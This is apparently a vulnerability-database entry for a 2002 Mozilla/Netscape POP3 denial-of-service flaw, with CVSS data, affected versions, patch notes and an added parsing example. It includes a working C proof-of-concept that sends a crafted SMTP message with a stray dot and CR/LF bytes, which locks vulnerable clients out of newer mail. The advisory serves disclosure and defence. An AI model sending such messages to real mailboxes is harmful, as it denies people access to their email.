Published: 2002-12-31 00:00:00
Last revised: 2008-09-05 16:32:57

[Original] The POP3 mail client in Mozilla 1.0 and earlier, and Netscape Communicator 4.7 and earlier, allows remote attackers to cause a denial of service (no new mail) via a mail message containing a dot (.) at a newline, which is interpreted as the end of the message.

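[CNNVD] Netscape / Mozilla Malformed Email POP3 Denial of Service Vulnerability (CNNVD-200212-382)

        The POP3 mail client in Mozilla 1.0 and earlier, and in Netscape Communicator 4.7 and earlier, contains a vulnerability. A remote attacker can cause a denial of service (no new mail) via a mail message containing a dot (.) at a newline, which is treated as the end of the message.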

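- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [the attacker needs neither internal-network access nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (Weakness Category)

CWE-20 [Improper Input Validation]

- CPE (Affected Platforms and Products)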

cpe:/a:netscape:communicator:4.76  Netscape Communicator 4.76
cpe:/a:mozilla:mozilla:0.9.2  Mozilla Mozilla Browser 0.9.2
cpe:/a:netscape:navigator:6.2  Netscape Netscape 6.2
cpe:/a:mozilla:mozilla:1.0  Mozilla Mozilla 1.0
cpe:/a:netscape:communicator:4.75  Netscape Communicator 4.75
cpe:/a:netscape:communicator:4.08  Netscape Communicator 4.08
cpe:/a:mozilla:mozilla:0.9.5  Mozilla Mozilla Browser 0.9.5
cpe:/a:netscape:communicator:4.5  Netscape Communicator 4.5
cpe:/a:mozilla:mozilla:0.9.7  Mozilla Mozilla 0.9.7
cpe:/a:mozilla:mozilla:0.9.3  Mozilla Mozilla Browser 0.9.3
cpe:/a:netscape:communicator:4.4  Netscape Communicator 4.4
cpe:/a:netscape:communicator:4.74  Netscape Communicator 4.74
cpe:/a:mozilla:mozilla:  Mozilla Browser
cpe:/a:mozilla:mozilla:0.9.6  Mozilla Mozilla Browser 0.9.6
cpe:/a:netscape:navigator:6.1  Netscape Netscape 6.1
cpe:/a:netscape:communicator:4.72  Netscape Communicator 4.72
cpe:/a:netscape:communicator:4.51  Netscape Communicator 4.51
cpe:/a:netscape:communicator:4.61  Netscape Communicator 4.61
cpe:/a:mozilla:mozilla:0.9.4  Mozilla Mozilla Browser 0.9.4
cpe:/a:netscape:navigator:6.2.2  Netscape Netscape 6.2.2
cpe:/a:netscape:communicator:4.6  Netscape Communicator 4.6
cpe:/a:netscape:communicator:4.77  Netscape Communicator 4.77
cpe:/a:mozilla:mozilla:0.9.8  Mozilla Mozilla Browser 0.9.8
cpe:/a:mozilla:mozilla:0.9.9  Mozilla Mozilla 0.9.9
cpe:/a:netscape:communicator:4.73  Netscape Communicator 4.73
cpe:/a:netscape:communicator:4.07  Netscape Communicator 4.07
cpe:/a:netscape:navigator:6.2.1  Netscape Netscape 6.2.1
cpe:/a:netscape:navigator:6.01  Netscape Netscape 6.01
cpe:/a:netscape:communicator:4.06  Netscape Communicator 4.06
cpe:/a:netscape:navigator:6.0  Netscape Netscape 6.0
cpe:/a:netscape:communicator:4.0  Netscape Communicator 4.0
cpe:/a:netscape:communicator:4.7  Netscape Communicator 4.7

- OVAL (Technical Details for Detection)


- Official Database Links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other Links and Resources
(PATCH)  BID  5002
(UNKNOWN)  XF  mozilla-netscape-pop3-dos(9343)

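- Vulnerability Information

Netscape / Mozilla Malformed Email POP3 Denial of Service Vulnerability
Medium risk  Other
2002-12-31 00:00:00 2002-12-31 00:00:00
        The POP3 mail client in Mozilla 1.0 and earlier, and in Netscape Communicator 4.7 and earlier, contains a vulnerability. A remote attacker can cause a denial of service (no new mail) via a mail message containing a dot (.) at a newline, which is treated as the end of the message.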

- Advisories and Patches

        Reportedly this issue is resolved in Mozilla 1.1. Alpha versions may be accessed at the following location:

- Vulnerability Information (21539)

Netscape 4.x/6.x, Mozilla 0.9.x Malformed Email POP3 Denial Of Service Vulnerability (EDBID:21539)
multiple dos
2002-06-12 Verified
0 eldre8
N/A [Click to download]

The Netscape Communicator and Mozilla browsers include support for email, and the ability to fetch mail through a POP3 server. Both products are available for a range of platforms, including Microsoft Windows and Linux.

Under some circumstances, malformed email messages may prevent Netscape and Mozilla clients from accessing POP3 mailboxes. In particular, users will be unable to access more recent messages or delete the malicious email. 

/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8 at afturgurluk (double dot minus one) org
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"

#define PORT 25

int sock;
char buffer[255];

void SigCatch(int sig) {
    (void)sig;
    fprintf(stderr, "\b\bbye!\n");
    exit(0);
}

int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);

    sock=socket(AF_INET, SOCK_STREAM, 0);
    if (sock<0) {
        return -1;
    }

    /* resolve the mail server named by MX and fill in its address */
    hp=gethostbyname(MX);
    if (hp==NULL) {
        return -1;
    }
    memset(&sout, 0, sizeof(sout));
    sout.sin_family=AF_INET;
    sout.sin_port=htons(PORT);
    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, (struct sockaddr *)&sout, sizeof(sout))<0) {
        return -1;
    }
    recv(sock, buffer, 255, 0); /* receive the banner... */
    send(sock, EHLO, sizeof(EHLO), 0);
    recv(sock, buffer, 255, 0); /* receive the welcome message... */
    send(sock, MAIL, sizeof(MAIL), 0);
    recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
    send(sock, RCPT, sizeof(RCPT), 0);
    recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
    send(sock, DATA, sizeof(DATA), 0);
    recv(sock, buffer, 255, 0);
    i=sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    sprintf(buffer+i+1, "\n.\n");
    send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, sizeof(QUIT), 0);
    recv(sock, buffer, 255, 0);

    return 0;
}
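
Added example (not part of the original advisory, and not Mozilla or Netscape code): RFC 1939 ends a multi-line POP3 response only at the exact octets CRLF "." CRLF, so the sketch below contrasts a lenient end-of-message check, a constructed model of the mistake the description names, with a strict one. The function names and the sample response are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed RETR response: status line, a body with a lone '.' framed by
 * bare CR/LF octets (not CRLF), then the real ".CRLF" terminator. */
static const char SAMPLE[] =
    "+OK 42 octets\r\n"
    "first line\n\r.\r \n"
    "rest of message\r\n"
    ".\r\n";

/* Return the body that follows the "+OK ..." status line, or NULL. */
const char *skip_status(const char *resp, size_t n, size_t *body_n) {
    for (size_t i = 0; i + 1 < n; i++)
        if (resp[i] == '\r' && resp[i + 1] == '\n') {
            *body_n = n - (i + 2);
            return resp + i + 2;
        }
    return NULL;
}

/* Model of the flaw: '.' after any CR or LF, then CR or LF, ends the message. */
long body_len_lenient(const char *body, size_t n) {
    for (size_t i = 0; i + 1 < n; i++) {
        int line_start = (i == 0 || body[i - 1] == '\r' || body[i - 1] == '\n');
        if (line_start && body[i] == '.' &&
            (body[i + 1] == '\r' || body[i + 1] == '\n'))
            return (long)i;
    }
    return -1;
}

/* RFC 1939: only CRLF "." CRLF (or a leading ".CRLF") ends it; -1 = need more. */
long body_len_strict(const char *body, size_t n) {
    if (n >= 3 && memcmp(body, ".\r\n", 3) == 0)
        return 0;
    for (size_t i = 0; i + 5 <= n; i++)
        if (memcmp(body + i, "\r\n.\r\n", 5) == 0)
            return (long)(i + 2);   /* keep the body's final CRLF */
    return -1;
}

int main(void) {
    size_t n = 0;
    const char *body = skip_status(SAMPLE, sizeof(SAMPLE) - 1, &n);
    if (!body) return 1;
    printf("lenient end at %ld, strict end at %ld of %zu body octets\n",
           body_len_lenient(body, n), body_len_strict(body, n), n);
    return 0;
}
```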


- Vulnerability Information

Netscape POP3 Client Malformed Message Newline Handling Remote DoS
Remote / Network Access, Context Dependent Denial of Service, Input Manipulation
Loss of Availability Upgrade
Exploit Public Vendor Verified

- Vulnerability Description

- Timeline

2002-06-12 Unknown
Unknown Unknown

- Solution

Upgrade to version 4.78 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

Unknown or Incomplete